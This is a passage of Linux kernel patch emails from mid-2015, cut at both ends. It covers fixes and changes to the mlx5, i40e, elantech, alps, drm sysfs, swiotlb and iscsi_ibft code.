*ibdev, + __be64 *sys_image_guid); +int mlx5_query_mad_ifc_max_pkeys(struct ib_device *ibdev, + u16 *max_pkeys); +int mlx5_query_mad_ifc_vendor_id(struct ib_device *ibdev, + u32 *vendor_id); +int mlx5_query_mad_ifc_node_desc(struct mlx5_ib_dev *dev, char *node_desc); +int mlx5_query_mad_ifc_node_guid(struct mlx5_ib_dev *dev, __be64 *node_guid); +int mlx5_query_mad_ifc_pkey(struct ib_device *ibdev, u8 port, u16 index, + u16 *pkey); +int mlx5_query_mad_ifc_gids(struct ib_device *ibdev, u8 port, int index, + union ib_gid *gid); +int mlx5_query_mad_ifc_port(struct ib_device *ibdev, u8 port, + struct ib_port_attr *props); int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, struct ib_port_attr *props); int mlx5_ib_init_fmr(struct mlx5_ib_dev *dev); From 647241ea10db87ed0448853fa510177dd89a7a63 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:47 +0300 Subject: [PATCH 718/872] IB/mlx5: Don't create IB instance over Ethernet ports Since we still don't have RoCE support in mlx5, avoid creating IB driver instance over Ethernet ports. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/main.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index a117e27b424a..f82969257332 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -1353,6 +1353,10 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) int err; int i; + /* don't create IB instance over Eth ports, no RoCE yet! */ + if (MLX5_CAP_GEN(mdev, port_type) == MLX5_CAP_PORT_TYPE_ETH) + return NULL; + printk_once(KERN_INFO "%s", mlx5_version); dev = (struct mlx5_ib_dev *)ib_alloc_device(sizeof(*dev)); From 4aa17b2879f66e478aa9b81cc3bbade6416126aa Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:48 +0300 Subject: [PATCH 719/872] mlx5: Enable mutual support for IB and Ethernet Ethernet functionality is only available when working in ISSI > 0 mode. Previously, the IB driver wasn't ready to work on that mode, and hence building both the IB driver and the Ethernet functionality in the core driver were disallowed by Kconfigs. Now, once we have all the pre-steps in place, we can remove this limitation. The last steps in the IB driver for getting that setup to work are: create dummy SRQ for the driver's use (until now we could use XRC_SRQ as SRQ and XRC_SRQ, after moving to ISSI > 0, we separate XRC SRQs from basic SRQs) and adapt the create QP function to be compatible with ISSI > 0. Signed-off-by: Haggai Abramovsky Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/main.c | 22 +++++++++++++++++++ drivers/infiniband/hw/mlx5/mlx5_ib.h | 1 + drivers/infiniband/hw/mlx5/qp.c | 3 ++- .../net/ethernet/mellanox/mlx5/core/Kconfig | 2 +- drivers/net/ethernet/mellanox/mlx5/core/qp.c | 7 ++++++ 5 files changed, 33 insertions(+), 2 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index f82969257332..d4dea86052d6 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -1324,8 +1324,29 @@ static int create_dev_resources(struct mlx5_ib_resources *devr) atomic_inc(&devr->p0->usecnt); atomic_set(&devr->s0->usecnt, 0); + memset(&attr, 0, sizeof(attr)); + attr.attr.max_sge = 1; + attr.attr.max_wr = 1; + attr.srq_type = IB_SRQT_BASIC; + devr->s1 = mlx5_ib_create_srq(devr->p0, &attr, NULL); + if (IS_ERR(devr->s1)) { + ret = PTR_ERR(devr->s1); + goto error5; + } + devr->s1->device = &dev->ib_dev; + devr->s1->pd = devr->p0; + devr->s1->uobject = NULL; + devr->s1->event_handler = NULL; + devr->s1->srq_context = NULL; + devr->s1->srq_type = IB_SRQT_BASIC; + devr->s1->ext.xrc.cq = devr->c0; + atomic_inc(&devr->p0->usecnt); + atomic_set(&devr->s0->usecnt, 0); + return 0; +error5: + mlx5_ib_destroy_srq(devr->s0); error4: mlx5_ib_dealloc_xrcd(devr->x1); error3: @@ -1340,6 +1361,7 @@ static int create_dev_resources(struct mlx5_ib_resources *devr) static void destroy_dev_resources(struct mlx5_ib_resources *devr) { + mlx5_ib_destroy_srq(devr->s1); mlx5_ib_destroy_srq(devr->s0); mlx5_ib_dealloc_xrcd(devr->x0); mlx5_ib_dealloc_xrcd(devr->x1); diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h index f731b2592a36..873dc354766a 100644 --- a/drivers/infiniband/hw/mlx5/mlx5_ib.h +++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h @@ -415,6 +415,7 @@ struct mlx5_ib_resources { struct ib_xrcd *x1; struct ib_pd *p0; struct ib_srq *s0; + struct ib_srq *s1; }; struct mlx5_ib_dev { diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c index 15fd485d1ad9..203c8a45e095 100644 --- a/drivers/infiniband/hw/mlx5/qp.c +++ b/drivers/infiniband/hw/mlx5/qp.c @@ -1012,7 +1012,8 @@ static int create_qp_common(struct mlx5_ib_dev *dev, struct ib_pd *pd, in->ctx.rq_type_srqn |= cpu_to_be32(to_msrq(init_attr->srq)->msrq.srqn); } else { in->ctx.xrcd = cpu_to_be32(to_mxrcd(devr->x1)->xrcdn); - in->ctx.rq_type_srqn |= cpu_to_be32(to_msrq(devr->s0)->msrq.srqn); + in->ctx.rq_type_srqn |= + cpu_to_be32(to_msrq(devr->s1)->msrq.srqn); } } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig index 0d7aef040fb0..158c88c69ef9 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig +++ b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig @@ -12,7 +12,7 @@ config MLX5_CORE config MLX5_CORE_EN bool "Mellanox Technologies ConnectX-4 Ethernet support" - depends on MLX5_INFINIBAND=n && NETDEVICES && ETHERNET && PCI && MLX5_CORE + depends on NETDEVICES && ETHERNET && PCI && MLX5_CORE default n ---help--- Ethernet support in Mellanox Technologies ConnectX-4 NIC. diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qp.c b/drivers/net/ethernet/mellanox/mlx5/core/qp.c index dc7dbf7e9d98..8b494b562263 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/qp.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/qp.c @@ -187,10 +187,17 @@ int mlx5_core_create_qp(struct mlx5_core_dev *dev, struct mlx5_destroy_qp_mbox_in din; struct mlx5_destroy_qp_mbox_out dout; int err; + void *qpc; memset(&out, 0, sizeof(out)); in->hdr.opcode = cpu_to_be16(MLX5_CMD_OP_CREATE_QP); + if (dev->issi) { + qpc = MLX5_ADDR_OF(create_qp_in, in, qpc); + /* 0xffffff means we ask to work with cqe version 0 */ + MLX5_SET(qpc, qpc, user_index, 0xffffff); + } + err = mlx5_cmd_exec(dev, in, inlen, &out, sizeof(out)); if (err) { mlx5_core_warn(dev, "ret %d\n", err); From f76502aa9140ec338a59487218bf70a9c9e92b8f Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Thu, 4 Jun 2015 11:34:41 +0200 Subject: [PATCH 720/872] of/dynamic: Fix test for PPC_PSERIES "IS_ENABLED(PPC_PSERIES)" always evaluates to false, as IS_ENABLED() is supposed to be used with the full Kconfig symbol name, including the "CONFIG_" prefix. Add the missing "CONFIG_" prefix to fix this. Fixes: a25095d451ece23b ("of: Move dynamic node fixups out of powerpc and into common code") Signed-off-by: Geert Uytterhoeven Cc: stable@vger.kernel.org #+3.17 Signed-off-by: Grant Likely --- drivers/of/dynamic.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c index 3351ef408125..53826b84e0ec 100644 --- a/drivers/of/dynamic.c +++ b/drivers/of/dynamic.c @@ -225,7 +225,7 @@ void __of_attach_node(struct device_node *np) phandle = __of_get_property(np, "phandle", &sz); if (!phandle) phandle = __of_get_property(np, "linux,phandle", &sz); - if (IS_ENABLED(PPC_PSERIES) && !phandle) + if (IS_ENABLED(CONFIG_PPC_PSERIES) && !phandle) phandle = __of_get_property(np, "ibm,phandle", &sz); np->phandle = (phandle && (sz >= 4)) ? be32_to_cpup(phandle) : 0; From 30520831f058cd9d75c0f6b360bc5c5ae49b5f27 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Fri, 8 May 2015 15:35:52 -0700 Subject: [PATCH 721/872] i40e/i40evf: Fix mixed size frags and linearization This patch fixes a bug where the i40e Tx queue will hang if this skb is passed to the driver. With mixed size fragments while using TSO there was a corner case where we needed to linearize but we were not. This was seen with iSCSI traffic and could be reproduced with a frag list that looks like this: num_frags = 17, gso_segs = 17, hdr_len = 66, skb_shinfo(skb)->gso_size = 1448 size = 3002, j = 1, frag_size = 2936, num_frags = 17 size = 4268, j = 1, frag_size = 4096, num_frags = 16 size = 5534, j = 1, frag_size = 4096, num_frags = 15 size = 5352, j = 1, frag_size = 4096, num_frags = 14 size = 5170, j = 1, frag_size = 4096, num_frags = 13 size = 3468, j = 1, frag_size = 2576, num_frags = 12 size = 750, j = 1, frag_size = 112, num_frags = 11 size = 862, j = 2, frag_size = 112, num_frags = 10 size = 974, j = 3, frag_size = 112, num_frags = 9 size = 1126, j = 4, frag_size = 152, num_frags = 8 size = 1330, j = 5, frag_size = 204, num_frags = 7 size = 1534, j = 6, frag_size = 204, num_frags = 6 size = 356, j = 1, frag_size = 204, num_frags = 5 size = 560, j = 2, frag_size = 204, num_frags = 4 size = 764, j = 3, frag_size = 204, num_frags = 3 size = 968, j = 4, frag_size = 204, num_frags = 2 size = 1140, j = 5, frag_size = 172, num_frags = 1 result: linearize = 0, j = 6 Change-ID: I79bb1aeab0af255fe2ce28e93672a85d85bf47e8 Signed-off-by: Anjali Singhai Jain Signed-off-by: Jesse Brandeburg Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 25 ++++++++----------- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 25 ++++++++----------- 2 files changed, 20 insertions(+), 30 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 4bd3a80aba82..9d95042d5a0f 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -2410,14 +2410,12 @@ static int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * i40e_chk_linearize - Check if there are more than 8 fragments per packet * @skb: send buffer * @tx_flags: collected send information - * @hdr_len: size of the packet header * * Note: Our HW can't scatter-gather more than 8 fragments to build * a packet on the wire and so we need to figure out the cases where we * need to linearize the skb. **/ -static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, - const u8 hdr_len) +static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags) { struct skb_frag_struct *frag; bool linearize = false; @@ -2429,7 +2427,7 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, gso_segs = skb_shinfo(skb)->gso_segs; if (tx_flags & (I40E_TX_FLAGS_TSO | I40E_TX_FLAGS_FSO)) { - u16 j = 1; + u16 j = 0; if (num_frags < (I40E_MAX_BUFFER_TXD)) goto linearize_chk_done; @@ -2440,21 +2438,18 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, goto linearize_chk_done; } frag = &skb_shinfo(skb)->frags[0]; - size = hdr_len; /* we might still have more fragments per segment */ do { size += skb_frag_size(frag); frag++; j++; + if ((size >= skb_shinfo(skb)->gso_size) && + (j < I40E_MAX_BUFFER_TXD)) { + size = (size % skb_shinfo(skb)->gso_size); + j = (size) ? 1 : 0; + } if (j == I40E_MAX_BUFFER_TXD) { - if (size < skb_shinfo(skb)->gso_size) { - linearize = true; - break; - } - j = 1; - size -= skb_shinfo(skb)->gso_size; - if (size) - j++; - size += hdr_len; + linearize = true; + break; } num_frags--; } while (num_frags); @@ -2724,7 +2719,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, if (tsyn) tx_flags |= I40E_TX_FLAGS_TSYN; - if (i40e_chk_linearize(skb, tx_flags, hdr_len)) + if (i40e_chk_linearize(skb, tx_flags)) if (skb_linearize(skb)) goto out_drop; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index b077e02a0cc7..458fbb421090 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1619,14 +1619,12 @@ static void i40e_create_tx_ctx(struct i40e_ring *tx_ring, * i40e_chk_linearize - Check if there are more than 8 fragments per packet * @skb: send buffer * @tx_flags: collected send information - * @hdr_len: size of the packet header * * Note: Our HW can't scatter-gather more than 8 fragments to build * a packet on the wire and so we need to figure out the cases where we * need to linearize the skb. **/ -static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, - const u8 hdr_len) +static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags) { struct skb_frag_struct *frag; bool linearize = false; @@ -1638,7 +1636,7 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, gso_segs = skb_shinfo(skb)->gso_segs; if (tx_flags & (I40E_TX_FLAGS_TSO | I40E_TX_FLAGS_FSO)) { - u16 j = 1; + u16 j = 0; if (num_frags < (I40E_MAX_BUFFER_TXD)) goto linearize_chk_done; @@ -1649,21 +1647,18 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, goto linearize_chk_done; } frag = &skb_shinfo(skb)->frags[0]; - size = hdr_len; /* we might still have more fragments per segment */ do { size += skb_frag_size(frag); frag++; j++; + if ((size >= skb_shinfo(skb)->gso_size) && + (j < I40E_MAX_BUFFER_TXD)) { + size = (size % skb_shinfo(skb)->gso_size); + j = (size) ? 1 : 0; + } if (j == I40E_MAX_BUFFER_TXD) { - if (size < skb_shinfo(skb)->gso_size) { - linearize = true; - break; - } - j = 1; - size -= skb_shinfo(skb)->gso_size; - if (size) - j++; - size += hdr_len; + linearize = true; + break; } num_frags--; } while (num_frags); @@ -1950,7 +1945,7 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, else if (tso) tx_flags |= I40E_TX_FLAGS_TSO; - if (i40e_chk_linearize(skb, tx_flags, hdr_len)) + if (i40e_chk_linearize(skb, tx_flags)) if (skb_linearize(skb)) goto out_drop; From fc60861e9b00388fd11d7995a60bf0b1e61dba93 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Fri, 8 May 2015 15:35:57 -0700 Subject: [PATCH 722/872] i40e: start up in VEPA mode by default The patch fixes a bug in the default configuration which prevented a software bridge loaded on the PF interface from working correctly because broadcast packets are incorrectly looped back. Fix the general case, by loading the driver in VEPA mode Until a VF or VMDq VSI is added. This way loopback on the Main VSI is turned off until needed and can resolve the issue of unnecessary reflection for users that do not have VF or VMDq VSIs setup. The driver must now coordinate the loopback setting for the Flow Director (FDIR) VSI to make sure it is in sync with the current VEB or VEPA mode setting. The user can still switch bridge modes from the bridge commands and choose to be in VEPA mode with VF VSIs. Because of hardware requirements, the call to switch to VEB mode when no VF/VMDqs are present will be rejected. NOTE: This patch uses BIT_ULL as that is preferred going forward, a followup patch in the lower priority queue to net-next will fix up the remaining 1 << usages. Change-ID: Ib121ddb18fe4b3c4f52e9deda6fcbeb9105683d1 Signed-off-by: Anjali Singhai Jain Signed-off-by: Jesse Brandeburg Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e.h | 1 + .../net/ethernet/intel/i40e/i40e_debugfs.c | 9 ++++++++ drivers/net/ethernet/intel/i40e/i40e_main.c | 21 +++++++++++++++---- .../ethernet/intel/i40e/i40e_virtchnl_pf.c | 10 ++++++++- 4 files changed, 36 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e.h b/drivers/net/ethernet/intel/i40e/i40e.h index 33c35d3b7420..5d47307121ab 100644 --- a/drivers/net/ethernet/intel/i40e/i40e.h +++ b/drivers/net/ethernet/intel/i40e/i40e.h @@ -317,6 +317,7 @@ struct i40e_pf { #endif #define I40E_FLAG_PORT_ID_VALID (u64)(1 << 28) #define I40E_FLAG_DCB_CAPABLE (u64)(1 << 29) +#define I40E_FLAG_VEB_MODE_ENABLED BIT_ULL(40) /* tracks features that get auto disabled by errors */ u64 auto_disable_flags; diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c index 34170eabca7d..da0faf478af0 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c +++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c @@ -1021,6 +1021,15 @@ static ssize_t i40e_dbg_command_write(struct file *filp, goto command_write_done; } + /* By default we are in VEPA mode, if this is the first VF/VMDq + * VSI to be added switch to VEB mode. + */ + if (!(pf->flags & I40E_FLAG_VEB_MODE_ENABLED)) { + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset_safe(pf, + BIT_ULL(__I40E_PF_RESET_REQUESTED)); + } + vsi = i40e_vsi_setup(pf, I40E_VSI_VMDQ2, vsi_seid, 0); if (vsi) dev_info(&pf->pdev->dev, "added VSI %d to relay %d\n", diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index a54c14491e3b..853eb2f7e558 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -6097,6 +6097,10 @@ static int i40e_reconstitute_veb(struct i40e_veb *veb) if (ret) goto end_reconstitute; + if (pf->flags & I40E_FLAG_VEB_MODE_ENABLED) + veb->bridge_mode = BRIDGE_MODE_VEB; + else + veb->bridge_mode = BRIDGE_MODE_VEPA; i40e_config_bridge_mode(veb); /* create the remaining VSIs attached to this VEB */ @@ -8031,7 +8035,12 @@ static int i40e_ndo_bridge_setlink(struct net_device *dev, } else if (mode != veb->bridge_mode) { /* Existing HW bridge but different mode needs reset */ veb->bridge_mode = mode; - i40e_do_reset(pf, (1 << __I40E_PF_RESET_REQUESTED)); + /* TODO: If no VFs or VMDq VSIs, disallow VEB mode */ + if (mode == BRIDGE_MODE_VEB) + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + else + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset(pf, BIT_ULL(__I40E_PF_RESET_REQUESTED)); break; } } @@ -8343,11 +8352,12 @@ static int i40e_add_vsi(struct i40e_vsi *vsi) ctxt.uplink_seid = vsi->uplink_seid; ctxt.connection_type = I40E_AQ_VSI_CONN_TYPE_NORMAL; ctxt.flags = I40E_AQ_VSI_TYPE_PF; - if (i40e_is_vsi_uplink_mode_veb(vsi)) { + if ((pf->flags & I40E_FLAG_VEB_MODE_ENABLED) && + (i40e_is_vsi_uplink_mode_veb(vsi))) { ctxt.info.valid_sections |= - cpu_to_le16(I40E_AQ_VSI_PROP_SWITCH_VALID); + cpu_to_le16(I40E_AQ_VSI_PROP_SWITCH_VALID); ctxt.info.switch_id = - cpu_to_le16(I40E_AQ_VSI_SW_ID_FLAG_ALLOW_LB); + cpu_to_le16(I40E_AQ_VSI_SW_ID_FLAG_ALLOW_LB); } i40e_vsi_setup_queue_map(vsi, &ctxt, enabled_tc, true); break; @@ -8746,6 +8756,9 @@ struct i40e_vsi *i40e_vsi_setup(struct i40e_pf *pf, u8 type, __func__); return NULL; } + /* We come up by default in VEPA mode */ + veb->bridge_mode = BRIDGE_MODE_VEPA; + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; i40e_config_bridge_mode(veb); } for (i = 0; i < I40E_MAX_VEB && !veb; i++) { diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c index 78d1c4ff565e..4e9376da0518 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c +++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c @@ -1018,11 +1018,19 @@ int i40e_pci_sriov_configure(struct pci_dev *pdev, int num_vfs) { struct i40e_pf *pf = pci_get_drvdata(pdev); - if (num_vfs) + if (num_vfs) { + if (!(pf->flags & I40E_FLAG_VEB_MODE_ENABLED)) { + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset_safe(pf, + BIT_ULL(__I40E_PF_RESET_REQUESTED)); + } return i40e_pci_sriov_enable(pdev, num_vfs); + } if (!pci_vfs_assigned(pf->pdev)) { i40e_free_vfs(pf); + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + i40e_do_reset_safe(pf, BIT_ULL(__I40E_PF_RESET_REQUESTED)); } else { dev_warn(&pdev->dev, "Unable to free VFs because some are assigned to VMs.\n"); return -EINVAL; From fa11cb3d16a9b9b296a2b811a49faf1356240348 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Wed, 27 May 2015 12:06:14 -0400 Subject: [PATCH 723/872] i40e: Make sure to be in VEB mode if SRIOV is enabled at probe If SRIOV is enabled we need to be in VEB mode not VEPA mode at probe. This fixes an NPAR bug when SRIOV is enabled in the BIOS. Change-ID: Ibf006abafd9a0ca3698ec24848cd771cf345cbbc Signed-off-by: Anjali Singhai Jain Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index 853eb2f7e558..5b5bea159bd5 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -8756,9 +8756,14 @@ struct i40e_vsi *i40e_vsi_setup(struct i40e_pf *pf, u8 type, __func__); return NULL; } - /* We come up by default in VEPA mode */ - veb->bridge_mode = BRIDGE_MODE_VEPA; - pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + /* We come up by default in VEPA mode if SRIOV is not + * already enabled, in which case we can't force VEPA + * mode. + */ + if (!(pf->flags & I40E_FLAG_VEB_MODE_ENABLED)) { + veb->bridge_mode = BRIDGE_MODE_VEPA; + pf->flags &= ~I40E_FLAG_VEB_MODE_ENABLED; + } i40e_config_bridge_mode(veb); } for (i = 0; i < I40E_MAX_VEB && !veb; i++) { @@ -9869,6 +9874,15 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent) goto err_switch_setup; } +#ifdef CONFIG_PCI_IOV + /* prep for VF support */ + if ((pf->flags & I40E_FLAG_SRIOV_ENABLED) && + (pf->flags & I40E_FLAG_MSIX_ENABLED) && + !test_bit(__I40E_BAD_EEPROM, &pf->state)) { + if (pci_num_vf(pdev)) + pf->flags |= I40E_FLAG_VEB_MODE_ENABLED; + } +#endif err = i40e_setup_pf_switch(pf, false); if (err) { dev_info(&pdev->dev, "setup_pf_switch failed: %d\n", err); From 692dd1916436164e228608803dfb6cb768d6355a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=B4=AA=E4=B8=80=E7=AB=B9?= Date: Thu, 4 Jun 2015 22:00:24 -0700 Subject: [PATCH 724/872] Input: elantech - add new icbody type This adds new icbody type to the list recognized by Elantech PS/2 driver. Cc: stable@vger.kernel.org Signed-off-by: Sam Hung Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/elantech.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c index f181d73d9629..ce3d40004458 100644 --- a/drivers/input/mouse/elantech.c +++ b/drivers/input/mouse/elantech.c @@ -1556,6 +1556,7 @@ static int elantech_set_properties(struct elantech_data *etd) case 9: case 10: case 13: + case 14: etd->hw_version = 4; break; default: From 088df2ccef75754cc16a6ba31829d23bcb2b68ed Mon Sep 17 00:00:00 2001 From: Hans de Goede Date: Thu, 4 Jun 2015 22:31:43 -0700 Subject: [PATCH 725/872] Input: alps - do not reduce trackpoint speed by half On some v7 devices (e.g. Lenovo-E550) the deltas reported are typically only in the 0-1 range dividing this by 2 results in a range of 0-0. And even for v7 devices where this does not lead to making the trackstick entirely unusable, it makes it twice as slow as before we added v7 support and were using the ps/2 mouse emulation of the dual point setup. If some kind of generic slowdown is actually necessary for some devices, then that belongs in userspace, not in the kernel. Cc: stable@vger.kernel.org Reported-and-tested-by: Rico Moorman Signed-off-by: Hans de Goede Reviewed-by: Benjamin Tissoires Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/alps.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/input/mouse/alps.c b/drivers/input/mouse/alps.c index 7752bd59d4b7..a353b7de6d22 100644 --- a/drivers/input/mouse/alps.c +++ b/drivers/input/mouse/alps.c @@ -1063,9 +1063,8 @@ static void alps_process_trackstick_packet_v7(struct psmouse *psmouse) right = (packet[1] & 0x02) >> 1; middle = (packet[1] & 0x04) >> 2; - /* Divide 2 since trackpoint's speed is too fast */ - input_report_rel(dev2, REL_X, (char)x / 2); - input_report_rel(dev2, REL_Y, -((char)y / 2)); + input_report_rel(dev2, REL_X, (char)x); + input_report_rel(dev2, REL_Y, -((char)y)); input_report_key(dev2, BTN_LEFT, left); input_report_key(dev2, BTN_RIGHT, right); From 38d8571dad8a759bdc051dbff747b189c90658cf Mon Sep 17 00:00:00 2001 From: Russell King Date: Sat, 6 Jun 2015 08:27:30 +1000 Subject: [PATCH 726/872] drm: fix writing to /sys/class/drm/*/status Writing to a file is supposed to return the number of bytes written. Returning zero unfortunately causes bash to constantly spin trying to write to the sysfs file, to such an extent that even ^c and ^z have no effect. The only way out of that is to kill the shell and log back in. This isn't nice behaviour. Fix it by returning the number of characters written to sysfs files. [airlied: used suggestion from Al Viro] Signed-off-by: Russell King Reviewed-by: Chris Wilson Signed-off-by: Dave Airlie --- drivers/gpu/drm/drm_sysfs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/drm_sysfs.c b/drivers/gpu/drm/drm_sysfs.c index ffc305fc2076..eb7e61078a5b 100644 --- a/drivers/gpu/drm/drm_sysfs.c +++ b/drivers/gpu/drm/drm_sysfs.c @@ -217,7 +217,7 @@ static ssize_t status_store(struct device *device, mutex_unlock(&dev->mode_config.mutex); - return ret; + return ret ? ret : count; } static ssize_t status_show(struct device *device, From 023600f192be3f5776336e2c61d577b551a1ca9c Mon Sep 17 00:00:00 2001 From: Alexandre Courbot Date: Tue, 26 May 2015 18:02:54 +0900 Subject: [PATCH 727/872] swiotlb: do not export map_single function The map_single() function is not defined as static, even though it doesn't seem to be used anywhere else in the kernel. Make it static to avoid namespace pollution since this is a rather generic symbol. Signed-off-by: Alexandre Courbot Signed-off-by: Konrad Rzeszutek Wilk --- lib/swiotlb.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/swiotlb.c b/lib/swiotlb.c index 4abda074ea45..3c365ab6cf5f 100644 --- a/lib/swiotlb.c +++ b/lib/swiotlb.c @@ -537,8 +537,9 @@ EXPORT_SYMBOL_GPL(swiotlb_tbl_map_single); * Allocates bounce buffer and returns its kernel virtual address. */ -phys_addr_t map_single(struct device *hwdev, phys_addr_t phys, size_t size, - enum dma_data_direction dir) +static phys_addr_t +map_single(struct device *hwdev, phys_addr_t phys, size_t size, + enum dma_data_direction dir) { dma_addr_t start_dma_addr = phys_to_dma(hwdev, io_tlb_start); From e6050b61df8a8765ce4e99da0b593d781c7fdfb1 Mon Sep 17 00:00:00 2001 From: Chris Leech Date: Thu, 28 May 2015 12:51:51 -0700 Subject: [PATCH 728/872] iscsi_ibft: filter null v4-mapped v6 addresses I've had reports of UEFI platforms failing iSCSI boot in various configurations, that ended up being caused by network initialization scripts getting tripped up by unexpected null addresses (0.0.0.0) being reported for gateways, dhcp servers, and dns servers. The tianocore EDK2 iSCSI driver generates an iBFT table that always uses IPv4-mapped IPv6 addresses for the NIC structure fields. This results in values that are "not present or not specified" being reported as ::ffff:0.0.0.0 rather than all zeros as specified. The iscsi_ibft module filters unspecified fields from the iBFT from sysfs, preventing userspace from using invalid values and making it easy to check for the presence of a value. This currently fails in regard to these mapped null addresses. In order to remain consistent with how the iBFT information is exposed, we should accommodate the behavior of the tianocore iSCSI driver as it's already in the wild in a large number of servers. Tested under qemu using an OVMF build of tianocore EDK2. Signed-off-by: Chris Leech Reviewed-by: Mike Christie Signed-off-by: Konrad Rzeszutek Wilk --- drivers/firmware/iscsi_ibft.c | 36 ++++++++++++++++++++--------------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/drivers/firmware/iscsi_ibft.c b/drivers/firmware/iscsi_ibft.c index 071c2c969eec..72791232e46b 100644 --- a/drivers/firmware/iscsi_ibft.c +++ b/drivers/firmware/iscsi_ibft.c @@ -186,8 +186,20 @@ struct ibft_kobject { static struct iscsi_boot_kset *boot_kset; +/* fully null address */ static const char nulls[16]; +/* IPv4-mapped IPv6 ::ffff:0.0.0.0 */ +static const char mapped_nulls[16] = { 0x00, 0x00, 0x00, 0x00, + 